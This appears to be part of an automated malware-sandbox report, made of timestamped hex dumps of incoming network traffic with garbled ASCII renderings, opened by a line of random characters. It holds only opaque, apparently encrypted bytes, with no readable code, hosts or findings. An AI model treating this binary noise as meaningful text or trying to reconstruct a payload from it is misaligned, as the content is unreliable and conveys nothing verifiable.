t37n,P8JDb*eqw7Y/jlq$<\):)S^YwlRzTJUE&aP!k`G9?]+q;B+1j"(o!]l3+
2022-08-05 09:32:58 UTC	60	IN	Data Raw: 38 b0 70 0e b7 92 84 c0 03 59 73 ba a5 ea 9c 2a 80 39 1b da ff 3c 55 d5 89 09 e1 12 95 c3 27 09 c9 a8 93 ee 2c 12 28 b6 e0 c9 7d 1a fd 0d 21 79 cd 00 e3 45 2d c4 2a e3 db ad 72 46 53 6a ea e2 bf a6 37 31 f9 0c c4 8e 0c 30 77 7e 62 d4 7b af b3 f8 10 c9 89 7a c3 87 ae 27 d9 cf 83 35 97 ec 12 6c b9 5b 72 f6 22 07 e5 2c 8f ff 7b 24 4a 87 67 cb e6 0a 0d 03 69 fe e6 bb 52 66 a3 ef 93 a2 8b 86 ba 4c 6d 83 3e 73 3e 72 da e8 fe 33 f2 b7 8c 1f 89 2c b2 fa 31 02 df 39 4d b5 39 c2 56 14 d6 12 15 a0 4b d7 ff 5c b3 05 d9 c9 55 98 1e 06 db 31 88 e6 9e af aa d2 37 c7 fd 97 1f 93 f8 bb b7 b9 ab 08 4b e7 69 2f 8e cd d6 2f 73 9c 08 aa 9d 99 7c b0 52 97 47 ea 46 d5 c1 b7 74 16 2b 05 09 33 8d 56 0d 54 d4 12 52 7c c5 c1 e4 66 93 4b c9 72 2e 65 6e f2 bd a7 08 6f f5 dd 29 8b ec Data Ascii: 8pYs9<U',(}!yE-rFSj710w~b{z'5l[r",{$JgiRfLm>s>r3,19M9VK\U17Ki//s\|RGFt+3VTR\|fKr.eno)
2022-08-05 09:32:58 UTC	61	IN	Data Raw: cf 83 2e eb 2b 91 6b a7 8b e7 5e fb a5 21 78 28 e7 75 cf 7a 3b 5e 12 e6 e7 43 8e 6c 33 33 d7 e5 d2 a2 b5 b9 a9 73 54 ac 9b 58 48 ea eb 99 78 2e 0b be 4b c3 3e 6e 3f f6 13 69 01 6d 5b bc 36 df b9 87 5e 72 a4 57 c6 97 ad 59 ab 24 4a 1e e3 fe 7f 0c 52 0d 5b 8c 8e f2 37 76 f2 e7 62 e5 55 8e af 01 d4 6b d5 7b 47 fe 7b a8 9c d3 70 92 c3 97 1d 6c 74 cb 91 d6 3e 88 f5 1e 45 fe 12 fb fe 7a 07 ef 24 03 6c bf dd 9f a5 87 61 73 e0 a6 48 cc 08 60 cc 91 12 8d b3 8f aa 4c ad 44 72 33 5c c8 6e ff db cd 2c 90 b4 58 47 30 23 8c c3 bf cb be ca 11 95 08 56 7a 7c 0a 2a 1d 6d 3b 04 7a 57 59 f0 7e a8 d3 f8 e8 cc a6 d1 8d e0 61 29 e3 b0 5e 42 5e 8f 2d 1e 36 aa cf dd ff 54 98 60 26 78 bf e2 76 5a 79 90 9c 1e e5 b5 ab 0c 15 b8 7c 12 cd 97 25 4b 33 cb 8e d8 a3 78 59 f2 89 75 e4 c4 Data Ascii: .+k^!x(uz;^Cl33sTXHx.K>n?im[6^rWY$JR[7vbUk{G{plt>Ez$lasH`LDr3\n,XG0#Vz\|*m;zWY~a)^B^-6T`&xvZy\|%K3xYu
2022-08-05 09:32:58 UTC	62	IN	Data Raw: ad ae 33 e5 79 0d 42 d5 87 b6 aa c6 f0 e4 be ff 64 c9 72 2f 73 72 07 c1 5e 0a 5e b5 e5 8c 8b ee fa 62 3a e3 7f 51 fc d3 88 2c 8e 17 bd d8 b3 a0 0a 4a 68 d5 12 5d a7 0e 8f 07 e0 f2 6d cd 7e 01 5d f4 1f d7 66 78 3e 9f 74 b8 27 ac 34 c5 1c 66 6c 4e 98 c3 cc 01 d9 72 dc 5a cc b4 75 a5 c6 ed d7 5d db 18 0a 38 d5 fa 07 1c e9 bd b2 80 3f 88 d6 34 f4 66 54 a0 d8 da f5 32 1a 31 d8 dd a6 52 14 49 9b 30 4d c2 17 50 6d 50 dd 87 d0 f8 5e 64 46 09 61 ab 67 98 c1 bd 12 42 99 44 fd e1 a2 b2 8b fd dd 76 e7 4c 83 da 61 84 1e 8e a6 c4 1a d2 96 6a 8e 6c 8b 0b fc 0d 2f a3 cf af e6 68 9a 54 9a 9c af c0 d4 3c 29 77 e5 2f 24 29 d7 7e de c3 fa 0c c8 6e 05 0e 6c 83 42 a3 0b 17 3f ea 5c ac 9d 30 cb cc a4 57 27 24 4d df ac f5 4d 6f 51 c4 96 f3 88 43 b6 f5 ac d0 50 d4 48 94 54 0e 2e Data Ascii: 3yBdr/sr^^b:Q,Jh]m~]fx>t'4flNrZu]8?4fT21RI0MPmP^dFagBDvLajl/hT<)w/$)~nlB?\0W'$MMoQCPHT.
2022-08-05 09:32:58 UTC	64	IN	Data Raw: bf 87 04 5a 7f 92 ac 06 f0 b5 de 0c f1 b0 0f 12 cd 96 24 4a 0b 52 e1 df d6 34 ed 30 89 74 e4 41 7d 84 aa f9 ce 4d c8 2c 26 8c cb 59 72 8d 3a 10 ee f8 b2 14 95 e9 64 19 00 b8 2c 8f 67 cb bc 99 b0 71 0e ce f1 84 65 79 48 e3 fe a4 e6 3f 2a 61 4c 1b cc fe d5 f8 96 8b 38 e2 2a c6 bc 27 09 c8 be ae 77 55 2e 28 87 b8 2d df 1a fc 0d 14 ee cd 5d 9b 79 ae 74 2b 73 7b ad ef c7 53 7c eb 43 2f 67 35 00 f9 b8 53 0c 0c 30 76 68 6f b2 02 93 b3 c9 38 aa 2b 7a c0 87 eb b2 d9 e6 f8 09 e8 5e 13 60 1b 5b 4f a1 22 11 e4 41 24 40 79 15 4a bf cd 4f e6 0a 0f 15 4c cb 9c 87 53 57 e3 0f 30 a2 8a 86 0b de 6d 76 45 4f d8 c9 db 78 5f 33 f2 3c 8c 09 8a 15 d5 4d 33 33 da 85 d6 3e 39 c2 53 02 82 e4 6e 59 49 e6 4a 3f 10 05 d8 c9 55 02 1e ab a1 c8 c7 5b 9f b7 0f d2 af 4b fd 81 1e 4e 67 ce Data Ascii: Z$JR40tA}M,&Yr:d,gqeyH?aL8'wU.(-]yt+s{S\|C/g5S0vho8+z^`[O"A$@yJOLSW0mvEOx_3<M33>9SnYIJ?U[KNg
2022-08-05 09:32:58 UTC	65	IN	Data Raw: a9 6e ab 8b cd 65 55 d4 f3 0d de 15 f7 be 3c 12 c5 b7 f3 7b be bf f4 e5 d5 a3 3b 69 94 9d 0c dd 71 f4 0d a1 64 18 73 2e 46 5a d2 f9 ea 0b f7 78 3e 3f 11 35 a9 d9 09 81 83 0f ac 26 bb 19 65 31 8b 22 ed d8 2b 98 8a 9e 86 ac bd 76 21 64 28 14 69 a8 96 8b 6f e7 9e 81 3b 16 6c c0 29 b0 e3 de be d9 9b c4 11 41 38 d6 42 23 ea f7 98 81 5c f5 d9 6f a0 c6 d8 e1 f6 3f 69 f8 71 30 38 32 fb 4b fe 38 02 26 57 05 8d ce 58 62 fc 21 91 b5 92 a7 40 16 17 5e 8d bf f5 3a 9f 5d a6 bd 87 48 27 60 08 bd 6a fb d3 d0 3a ac e2 a0 10 f1 43 02 95 ee 76 71 cb f8 cf 5a 0a 93 72 2d df e7 52 79 73 36 ee 74 ce 5e 25 ed f0 c4 5e 4a 7a d1 a4 3b 64 ae d0 22 c1 e7 f9 2a a6 79 4d d2 ed ef 34 2d 21 7f 31 bc a2 7c e4 80 f1 ee 39 b2 8e 5e a7 c4 e7 5d 7d 54 c0 76 7a ed 09 c2 00 cb 63 d0 1b cc 81 Data Ascii: neU<{;iqds.FZx>?5&e1"+v!d(io;l)A8B#\o?iq082K8&WXb!@^:]H'`j:CvqZr-Rys6t^%^Jz;d"*yM4-!1\|9^]}Tvzc
2022-08-05 09:32:58 UTC	66	IN	Data Raw: 12 3b d8 b7 e7 87 a2 ba cf 49 76 18 e5 78 c3 1e ca f5 1c ee e6 c7 b1 cf 93 d6 ca 84 97 ac fc f5 6f 7a 64 ae ea e8 dd b3 31 98 a3 ec 96 cf 82 ea e5 f7 65 86 7e 61 d2 e7 bc f1 63 ff 07 5e 2a 87 ee fa 0e 8e 7a 54 f5 31 96 05 8e 00 0d fe 2c 55 08 9d 07 9f 4d 92 17 37 3f cb 89 c0 92 4b 05 f1 5a e5 0e 58 fd 64 2e c7 f1 73 31 5a e1 ad b6 b4 22 e8 0b 49 0c e7 8d aa c0 9a 53 b6 44 a7 51 87 f7 8a be 82 fd 61 cf 14 84 96 21 9d ff b3 21 c4 54 0b 11 6d d1 6a ec cf cf dc 04 ab 1f 28 e6 6f 91 0b 33 4f d7 10 c8 d9 20 88 ad 36 f9 d2 23 14 48 19 f1 ff 78 e7 9c 24 e0 30 3d 63 88 c3 bf 92 0d 82 59 06 0f 54 ba a8 5f 58 be 59 cc 76 af ab b1 95 d9 b8 e0 68 64 79 e1 8c 59 ee 22 6f 37 b7 66 cb c8 c8 50 3f 14 77 78 77 d8 93 47 b1 41 c0 97 c8 73 da d7 3c 1e 1d 76 5f 3d 88 a4 61 f0 Data Ascii: ;Ivxozd1e~ac^*zT1,UM7?KZXd.s1Z"ISDQa!!Tmj(o3O 6#Hx$0=cYT_XYvhdyY"o7fP?wxwGAs<v_=a
2022-08-05 09:32:58 UTC	67	IN	Data Raw: 33 6b 4c fe 0d 1c df a1 ca a7 49 fb f4 90 bb 27 53 7c c1 cb bf 8c ad 4d c9 54 a0 c1 07 e0 4d 2e 2d 81 45 2b 89 82 08 5d 94 43 5b 9f c6 d8 4f c5 42 27 c8 c1 33 03 b6 8b b8 15 15 38 c7 3e 82 42 85 1f b4 cb 72 ca 02 27 6e 92 e9 d4 e6 1f b6 a6 ac 27 c1 b4 8c 0d 1a a7 cc 12 d5 6c ad d5 c0 ae c5 4f 2b 7e 48 02 40 a9 39 93 41 76 e5 97 85 7b d1 57 20 7d d5 0e 88 dd e3 2b aa 3b 91 c6 fe 6f 35 b4 5d f6 25 18 1c 0b 33 d4 53 30 f3 d9 94 af 87 8f 41 f7 ad b6 49 9c c3 7a 63 ef 35 a1 ef 08 5a 75 d7 e6 3a f4 e9 be 08 97 ce 16 f8 d0 ba 52 3f 09 ae c7 81 29 bb 6b 7b 92 20 c9 16 2b 9c 41 c0 6d dc e1 78 45 6b 07 05 fe 75 14 06 6c 6e 97 34 5c 0b 36 06 62 6d 2e a0 69 7d 03 dd 2a e4 9d 66 b5 71 2c fc b9 7c 3b db d4 36 80 7f 9c 07 5c d2 0a 03 da 2c 8c ed f3 45 05 47 d8 e3 0f 44 Data Ascii: 3kLI'S\|MTM.-E+]C[OB'38>Br'n'lO+~H@9Av{W }+;o5]%3S0AIzc5Zu:R?)k{ +AmxEkuln4\6bm.i}*fq,\|;6\,EGD
2022-08-05 09:32:58 UTC	68	IN	Data Raw: 37 2d a0 67 84 47 8f 5e 06 f7 6d ce 7a 15 3d ce e4 81 b8 13 4d 38 91 0e 6d 3d cd 12 c8 ba 11 bd 75 84 c9 08 fb b7 7d c7 f9 8f 67 b2 20 3c e5 0f f7 91 74 e0 be e3 cd 41 d7 5b db b7 e3 fb a8 30 54 06 44 3b 32 1c 38 52 98 92 a5 6d f8 ad 58 0e 37 43 95 68 bb 1a e0 4c 54 8f dc b8 7d fc 20 39 1c 24 64 9c 2e f2 28 b8 a1 16 e6 53 e8 85 a7 f1 70 d3 08 66 90 d1 e0 56 5e c6 2a 9e 01 01 cf 0d 9f d4 db c2 9e f1 b8 22 4f 51 7e d9 ab f9 83 fb d9 0c f1 79 7c 12 cd 80 24 4a 7f 52 e1 de d6 3b 99 31 89 75 e4 c4 09 c7 aa 09 c6 c4 b5 02 2f bb c2 dd 0f b3 33 57 e7 7c cf 7d 9c 4c 6d 49 7d 16 25 3c 6e 5e c0 25 b9 bc 07 63 8d c4 6f 2c 42 2a 81 c3 ec 52 20 02 33 93 c6 70 df 87 e3 49 32 34 20 e8 c9 c0 03 34 b4 8c fc 78 25 12 8c ab a6 8a 11 34 06 db 64 c1 51 be 75 56 f9 bc 7f ce a1 Data Ascii: 7-gG^mz=M8m=u}g <tA[0TD;28RmX7ChLT} 9$d.(SpfV^"OQ~y\|$JR;1u/3W\|}LmI}%<n^%co,BR 3pI24 4x%4dQuV
2022-08-05 09:32:58 UTC	69	IN	Data Raw: 7a 8f da 1c 15 92 99 f9 39 a3 30 34 55 a6 98 68 f7 bb d4 d0 81 72 f4 8a 46 9b 14 3b a7 93 f4 a3 5a 69 99 86 b1 e4 32 67 15 b9 30 1e b9 64 75 49 3d f3 d3 b9 fb 7b 0b 31 7b 4f 54 49 ea ac cc 12 c4 a1 37 89 85 cf 93 8a 91 b4 11 89 05 91 b6 14 e2 77 69 e4 97 63 a3 e2 aa a1 42 cf 78 9d 8b 04 cd a8 ae 8d 14 ac 3a ff f2 9c c7 be 58 45 1a e5 de 13 48 a7 15 f0 3a d2 60 c8 0e 61 91 49 f3 2b 91 39 0c 1e 86 30 ad f3 c5 ea a0 c8 78 43 85 64 df c8 9a 3e 47 67 ad b8 96 e4 c8 92 b6 c0 b8 35 4f 7a d8 3b 6e 4a 0e 83 4a f7 12 86 47 c4 22 f8 be 7f 82 6d 93 52 3a 2e 8b db 4b 68 8e bf ab 7d 46 97 3a 15 4d 4d 61 ae 66 c9 b1 78 68 0a 03 bd 27 92 c3 f8 a0 05 f3 4b 96 ec 00 7a f7 89 57 5f 2d 43 43 bb 8a b1 df 54 e8 c0 7f 17 59 5c 3d 48 a7 82 fb 0a 29 ed b6 2d d4 11 94 e3 85 66 08 Data Ascii: z904UhrF;Zi2g0duI={1{OTI7wicBx:XEH:`aI+90xCd>Gg5Oz;nJJG"mR:.Kh}F:MMafxh'KzW_-CCTY\=H)-f
2022-08-05 09:32:58 UTC	71	IN	Data Raw: 94 4f 47 97 4f 7b a6 cb f4 9f 14 5a 5e f5 88 cf aa 6e 98 0d 71 1d a2 3e ff 0a 5c f5 7b 01 16 ce 17 35 20 2f 9e 22 b4 92 7c 6e 9e d7 66 de 7e 5f 14 0d 11 42 55 fa df ad 7e 5e 78 0e ba eb cb 31 8a 92 98 6a fe 9b 61 01 77 3e 72 a5 56 70 86 2a a1 b1 18 76 2e bf 80 a4 93 68 61 70 69 1d f9 e4 24 36 cc ec 5c c7 8b d5 d3 20 08 76 01 21 49 2e db 3d 33 45 9b c5 e3 67 e4 70 a7 b2 33 60 ae e0 8d dc 58 ae 10 6d ba 0b 0b 2b 48 a3 88 d1 7e 71 98 bb 32 fd 1e ee d6 ad e5 a3 d7 d6 60 b6 5b a2 8f 81 5a 38 e6 2c c0 c0 cb 2e 8b 8b 0c 5d ee ea d6 67 77 06 6e eb e8 88 b7 de 52 d0 04 fc 01 f1 d4 2a 77 6e 6b de d4 5d ee 04 68 31 a1 eb 5a 85 8f b4 8c cd 47 24 ba 13 4c 1f 0b 37 88 30 7f 6f c2 d5 c5 e5 98 c9 0d 0a aa 11 24 ca 65 b8 65 e0 61 ed 32 f1 a0 43 25 1e 72 4e 34 c3 40 ff a5 Data Ascii: OGO{Z^nq>\{5 /"\|nf~_BU~^x1jaw>rVpv.hapi$6\ v!I.=3Egp3`Xm+H~q2`[Z8,.]gwnRwnk]h1ZG$L70o$eea2C%rN4@
2022-08-05 09:32:58 UTC	72	IN	Data Raw: 48 05 51 46 a3 86 d2 fd 4f ec f9 78 26 51 4d 34 2d ab 9f ec 0a 2f fc ac 3f c5 3f 91 f3 85 67 0c 6c 45 09 4d cd 8c d1 89 3a 2c 5b 39 b2 f2 df 37 db af ba 4b 94 f2 1d 25 96 0d 1c f9 e7 97 76 42 10 d5 0d e0 21 fa 72 01 99 0a a7 09 2f 5b 81 e2 c8 cc 1f 3e 12 fa 78 21 11 be f9 a1 cd 58 95 1c 20 b2 ce fb ac 0f 69 9a 4d 0a 9e 73 a5 82 c1 bf b9 1d 84 ca 2d cd 5b 92 22 b7 71 e3 f3 cc 75 0a c1 25 15 46 5c 73 80 eb af c7 40 ce 5d 3d 24 45 51 e4 b7 c2 7d a6 af 1d f1 af 99 39 13 64 5e 6e 02 0f 9c 5a 32 4d a0 d3 77 bf 91 8e a5 c5 a3 45 3b 67 42 fa de b8 bc 3d ea 2d 5d 58 c7 a2 2b f6 15 8e 0d 9e fb d0 8c 02 28 10 fc ea eb e3 d2 ad 0d b5 10 0f 71 bf f2 50 22 10 3c 80 ac af 38 fa 5c 89 32 81 aa 6c f6 c3 98 8f 8f d9 2c 61 ea a5 81 74 e4 59 47 8b 42 b3 66 fc 98 1d a8 11 cb Data Ascii: HQFOx&QM4-/??glEM:,[97K%vB!r/[>x!X iMs-["qu%F\s@]=$EQ}9d^nZ2MwE;gB=-]X+(qP"<8\2l,atYGBf
2022-08-05 09:32:58 UTC	73	IN	Data Raw: 1c a7 a4 bc b3 ae b6 57 42 a8 47 12 ca 21 e1 7d dd 59 f2 31 be 9d 0a 68 55 62 16 65 d7 37 ca 8a a1 90 1a 9e 0b ef 20 cd 7a b0 2c 83 7d cb 2e 8e 52 3c 42 87 4a 0b 2a 9e d2 ad 8a 56 af f8 d6 2d f5 85 30 3a bd d0 d7 7f e6 24 00 73 98 b2 5f b5 96 de ea c0 5b c4 9c 61 9d 34 1f b7 9e a3 cc 62 27 d1 e7 fe 9b 22 2d 1f fe 54 35 8e 7b 6f 18 1a ec ea a8 ed 5c 53 13 46 37 7c 40 cb 8a c9 41 f0 93 17 c9 d2 93 b7 b3 a9 8e 42 9d 48 a0 b2 0d f0 6d 63 80 81 74 bf c9 82 96 0f e7 5f cb ad 0f c5 ac 8a a0 08 a9 61 9a bd 92 84 d1 18 7d 27 bd c0 52 40 f3 37 a9 2e da 7d b0 3b 5d d1 5e f5 14 d5 36 1f 7a c9 61 dc dc d7 f6 fc ed 18 55 8f 6f 88 c3 a4 03 02 54 be a2 a4 cd fe cb a3 ea b2 1b 6f 76 d2 31 56 4f 02 89 6f ac 23 8a 38 c6 12 af e1 6d cd 0e d5 1c 4b ae 69 01 de de 3f 0d 68 d3 Data Ascii: WBG!}Y1hUbe7 z,}.R<BJ*V-0:$s_[a4b'"-T5{o\SF7\|@ABHmct_a}'R@7.};]^6zaUoTov1VOo#8mKi?h
2022-08-05 09:32:58 UTC	75	IN	Data Raw: de 55 e8 27 d2 fd 7e c2 8e ac f9 ba ca 4a 7c df b3 d3 6a f4 5d 29 ee 02 fb 65 fa d9 34 9a 4d d6 74 cd 2e b3 f0 c1 ef 32 36 e4 ce c0 30 29 17 07 ec d4 d1 50 5a ce 72 29 bc be e4 5f ae db 08 a7 64 66 f6 16 66 f4 be b0 ca 24 5f 18 ef d1 fb 91 50 c9 68 76 1a 85 0d af 35 5f 9d 63 43 14 dd 33 7b 6e 7c c9 7e b7 b7 57 73 bc eb 53 e9 3a 42 2e 0f 34 45 36 d2 e4 9e 4e 59 7b 30 fb ca ff 5d 9a ac bb 7a a2 a8 6a 26 23 1e 2b ce 6d 5a b7 04 98 92 44 15 68 82 b5 9a 8d 72 3c 77 2b 15 f2 f4 68 3f f2 ef 55 95 af d6 d9 2c 0b 23 28 7d 5a 02 ba 11 2f 59 c4 c3 d3 41 b1 63 ac f1 5d 79 91 b7 9d 86 7b 8b 14 31 a2 58 3e 01 2c d2 a4 e6 29 6d e9 83 1d f7 66 d9 f8 c8 a8 ea ee c3 7b a1 44 86 95 a5 5b 3e cb 04 d9 fd 9d 33 82 de 3d 77 c4 a2 8c 51 7d 0f 6e d1 aa b9 b5 89 31 a5 3e ce 74 f2 Data Ascii: U'~J\|j])e4Mt.260)PZr)_dff$_Phv5_cC3{n\|~WsS:B.4E6NY{0]zj&#+mZDhr<w+h?U,#(}Z/YAc]y{1X>,)mf{D[>3=wQ}n1>t
2022-08-05 09:32:58 UTC	76	IN	Data Raw: 50 3d fd 1f 66 45 1a b3 46 fa 09 84 3d f5 75 be 92 69 aa 5f af 1c 3a ef 36 23 e8 a5 3e 07 61 c4 c5 53 cf b5 a0 90 e2 1d a4 40 40 b7 f2 c6 eb 35 c3 5a 5b 30 61 b6 11 89 f3 ea 56 60 ec aa 73 4f 14 01 5c e1 84 ef be 03 bc de 55 1f 0c 56 0b 7f 8c a8 dc 1e 0f f7 9c 1d e6 54 b5 f3 b3 56 5f 46 58 7f 1c 94 cb f0 93 0d 65 6b 65 99 f2 e6 02 fe 97 a7 58 b1 f4 43 40 cb 6e 38 f8 e1 81 37 15 59 d6 0b ec 19 d8 5d 48 a2 34 85 4d 25 60 df db f5 f3 2e 2f 28 c4 65 2d 49 f7 91 ed 94 61 a2 24 15 94 8f 81 c7 18 6b d9 4f 2f 9c 41 aa b8 cb 9f 82 1d ad f6 27 ab 72 b8 32 85 5e d7 d4 9b 69 01 ea 0f 45 61 2c 50 cf e0 bc 9f 2d c3 33 29 25 69 62 d4 81 da 1b 90 af 3b f6 ba db 39 1d 72 40 5d 04 52 fe 6c 6c 15 f1 85 2b a2 89 ba 83 f4 e6 01 1e 66 4c c0 86 a5 89 2c e7 77 68 47 9a a6 16 c9 Data Ascii: P=fEF=ui_:6#>aS@@5Z[0aV`sO\UVTV_FXekeXC@n87Y]H4M%`./(e-Ia$kO/A'r2^iEa,P-3)%ib;9r@]Rll+fL,whG
2022-08-05 09:32:58 UTC	77	IN	Data Raw: be cd 7e 02 b0 27 84 e6 9e 2a d8 82 1e 12 b3 db f5 1f 7e 41 78 cf ff d0 99 ea 1f f9 0f ae 05 b3 cc 11 27 6b 18 c5 fa 40 b9 1c 44 07 9e e8 41 bd fe af ac ff 71 28 9e 06 5c 17 20 43 e5 6a 36 5e d7 e8 fd e8 db ab 54 64 af 16 64 b8 23 fd 69 c0 62 84 2e d5 ea 73 2d 09 64 1f 60 a7 2c b2 b1 8c 81 14 ab 5a d8 19 a6 3b 91 2c 8e 54 e9 3f 8b 73 23 79 82 48 29 3c ba e1 fb 9f 38 e9 f2 8c 05 99 db 18 16 b2 83 8f 08 8f 1a 5b 05 d5 d8 3a f4 ad c5 84 b8 08 ce 93 5f c5 0a 3b b0 a8 fe 8c 66 63 82 86 b4 c9 02 29 41 da 13 70 b1 2e 68 59 0f 85 d3 a2 f2 26 33 12 47 16 21 4e ce 85 ee 71 c7 e0 1e 9e a1 e0 d9 85 92 90 2d 93 30 98 ea 29 e3 4c 65 85 86 54 e2 a2 f2 cc 4f b6 7b af a5 06 c6 fe ed a4 34 b9 1b ca ab f8 9d d4 6d 1b 01 a6 e1 08 68 ea 41 de 7d 83 7d 9d 5f 73 8d 5d f1 15 eb Data Ascii: ~'*~Ax'k@DAq(\ Cj6^Tdd#ib.s-d`,Z;,T?s#yH)<8[:_;fc)Ap.hY&3G!Nq-0)LeTO{4mhA}}_s]
2022-08-05 09:32:58 UTC	78	IN	Data Raw: 50 63 bf 26 20 4f b2 c5 64 9d be ab fc c9 9d 07 40 60 64 c3 c8 e3 94 10 e1 5e 69 0a 97 cf 67 a5 25 98 27 df fb f3 bd 52 3f 5b f3 f9 c2 cb d0 a6 7d 8b 29 24 41 fa e0 19 76 7f 71 dc af e3 2e f3 69 d6 18 d7 b1 6b d2 ec 9d ac a6 c9 55 53 b8 8c a9 7e cc 07 29 ee 02 fb 65 d2 de 20 bc 1d dd 4d cb 2c a5 9a bd da 46 5a 81 fd d0 03 5f 39 11 b6 99 e6 1d 17 f1 77 7f 87 a9 a6 72 b1 de 67 98 73 50 ad 72 42 f0 e4 f5 a1 26 46 5d ba dc ad fc 27 8c 75 58 0d 9e 11 f2 2e 5e c3 6e 37 37 e9 1e 76 77 3a 9f 13 88 de 52 3d c5 b8 45 b3 7d 03 14 05 52 60 75 d7 c8 87 48 5b 19 03 e7 ff d8 5a 9a 8d c0 6b d2 bf 7c 08 48 3d 07 bb 57 69 8e 20 9d 84 0e 59 32 8b f2 fd a1 4b 30 15 4a 72 ed e5 07 19 90 bc 08 92 f2 b4 ea 11 0e 0f 00 3b 63 77 ae 13 29 5e b3 8a b1 09 aa 28 b8 a7 4a 17 a9 c1 ac Data Ascii: Pc& Od@`d^ig%'R?[})$Avq.ikUS~)e M,FZ_9wrgsPrB&F]'uX.^n77vw:R=E}R`uH[Zk\|H=Wi Y2K0Jr;cw)^(J
2022-08-05 09:32:58 UTC	80	IN	Data Raw: f2 93 e6 52 e3 25 df d7 e8 9f fa 4a 59 06 a7 ef 53 6b 84 14 bc 3a fc 6a 85 04 54 b6 15 be 42 81 36 53 25 b5 1e d4 ee 86 c4 98 fc 3b 66 80 4f e6 ea cd 1c 65 33 b3 fc 85 b5 99 92 d6 91 a0 63 05 37 d9 05 36 61 5e c7 60 fc 1a a6 23 f1 03 ee 85 6e b2 54 81 1c 07 cc 28 6f d8 d1 78 0d 7a a4 f0 67 9c a2 8f 95 ea 7a aa 48 06 92 c1 e6 ee 68 cf 20 70 0e 7a 80 15 bc a6 df 30 79 d5 a7 5a 73 3e 59 61 9e 90 83 83 20 a2 92 60 23 72 70 0e 7b 86 a1 ca 16 10 db 8e 7d e5 76 f5 be 98 25 5a 7b 0c 66 05 a3 db 85 95 27 57 64 1f a0 db f7 13 f1 95 8a 54 b2 c3 2b 31 b5 5b 63 da ed 84 0a 0b 64 84 59 f3 2d bf 74 59 b7 20 ed 3b 71 4f bf 92 d6 d5 32 30 4c c2 56 07 3a bd ac f3 a9 33 c9 03 1d 8f ca 9c 88 32 36 85 10 29 9e 70 af b1 cd 93 af 35 b2 c4 6c be 59 84 01 9b 44 a4 dd da 42 03 fc Data Ascii: R%JYSk:jTB6S%;fOe3c76a^`#nT(oxzgzHh pz0yZs>Ya `#rp{}v%Z{f'WdT+1[cdY-tY ;qO20LV:326)p5lYDB
2022-08-05 09:32:58 UTC	81	IN	Data Raw: 35 fb b9 08 e1 bd fe e3 3e 2e 2e 7c 02 7a 74 ac 45 60 33 d1 8a fd 42 ed 4f 82 a1 4a 72 af c9 b1 dc 69 f2 11 57 85 25 05 01 2d b6 89 89 2d 05 fa f4 24 eb 2b da d2 9f ea b4 ce ef 49 a4 0e a0 cd d1 2a 0a dc 2f e6 fd fb 7d d2 e7 4a 12 ff bc 85 6a 7e 2a 54 d0 d0 a9 8a f1 00 d1 20 cb 76 d7 fa 20 28 6a 5d 90 90 33 ae 6b 7c 75 9b b5 18 d2 a5 c9 ab 86 03 7e a2 1a 4f 25 5f 7e ad 39 51 19 93 e8 b1 8b cf c7 4e 4e ab 4b 17 89 1f d6 19 e7 42 8b 14 c5 c8 4f 1b 1a 75 51 79 d7 5e b2 fd c2 d1 50 bd 15 ce 1b b7 40 bd 2a a1 37 d6 50 c3 68 22 6b b4 58 43 0d 88 c3 82 f1 3d d9 e8 db 2b 9f 8e 04 41 ba 94 9d 2f b5 67 6b 4d be b0 6f b0 98 f3 f0 c0 6b fa d4 09 f4 44 69 b0 80 ec c4 7e 7b ba 8e 94 d2 60 51 0e 98 5a 38 81 27 4f 15 08 af f3 ed a8 1f 47 7b 79 03 5e 64 d1 ae f6 4a ce 96 Data Ascii: 5>..\|ztE`3BOJriW%--$+I/}Jj~T v (j]3k\|u~O%_~9QNNKBOuQy^P@*7Ph"kXC=+A/gkMokDi~{`QZ8'OG{y^dJ
2022-08-05 09:32:58 UTC	82	IN	Data Raw: ff bc 47 78 b3 ec 24 eb 40 14 0e 58 04 56 3f ae b1 8c 7f 5d 59 03 86 ff c7 42 ad 95 f9 4e f0 a9 56 0e 6e 29 1b 93 51 11 c6 7c 84 f1 1e 61 23 c9 86 fd d4 64 3d 22 0f 16 ca d3 28 62 c4 fc 79 d3 f3 c4 fb 35 5c 02 1b 27 4f 67 b2 14 64 72 91 93 b8 4f d0 4a 8e b1 0e 33 fd b8 9f c7 0c b3 26 74 99 3f 00 15 30 aa 8e 82 71 42 b2 af 14 c3 29 dc f1 f5 b6 d7 bc 8a 7f e4 02 bd 93 c7 78 7e dc 70 87 bc c4 26 81 8f 25 1b c7 e3 af 70 5c 2c 46 df ec 85 b2 f1 3d e4 25 86 23 c0 db 37 25 7d 7c fa 9d 0b b0 56 2e 7f a5 fd 44 f7 a3 97 dd c4 07 0f fd 30 7e 01 16 03 93 26 5e 14 b6 ba dd b6 d1 fa 1c 37 92 48 69 a5 14 8f 46 e5 31 c9 7e ca 97 7f 02 3d 45 5b 36 ef 6c d9 81 ff cf 6d ef 43 cd 21 95 50 a5 01 dd 60 f7 10 8e 6c 3c 54 81 5f 0a 5f 9d ca 87 ab 39 92 81 94 3c fb fb 16 07 9d a5 Data Ascii: Gx$@XV?]YBNVn)Q\|a#d="(by5\'OgdrOJ3&t?0qB)x~p&%p\,F=%#7%}\|V.D0~&^7HiF1~=E[6lmC!P`l<T__9<
2022-08-05 09:32:58 UTC	83	IN	Data Raw: c1 bd 2e 63 71 1a bc c5 f2 1b c1 bb 9e 0c a8 da 2c 70 93 58 10 e5 ff c2 51 06 20 e1 15 d1 65 e3 74 48 e9 6b f6 47 36 0b 99 ae d7 8c 36 21 4b a7 2c 25 30 8f c5 a4 9a 42 9c 38 76 9b f8 9a b7 15 35 b6 43 06 ad 15 aa bf f3 9f a9 3a b3 d7 1b 85 71 e8 66 c3 37 de c3 9a 5d 38 d7 2b 36 62 12 54 95 f3 b0 d1 4b b0 5a 10 34 05 52 d5 af f0 61 8c fb 24 f1 b4 a1 1f 12 53 50 58 27 32 ee 7c 35 67 b8 ef 2b d3 db d5 bd d9 9c 61 1d 79 1d c6 f7 92 97 17 f8 63 64 4f de bd 30 ef 67 ba 24 ab df f7 a4 05 0f 30 e3 fe c2 f3 db 8c 78 9f 20 2b 68 99 e1 57 76 7f 71 dc af b0 4a fa 04 de 01 a1 e0 2d f0 c2 b5 fb bd c5 6e 6b f9 a4 d7 73 bd 56 60 86 13 90 52 a0 84 09 8a 21 cb 65 f8 56 94 f1 e0 e2 1b 69 8a 84 a7 58 0a 09 47 d4 d5 89 52 7e c9 00 7a 9a 9b a2 43 ac ef 5d d3 5f 55 b2 6a 3f b3 Data Ascii: .cq,pXQ 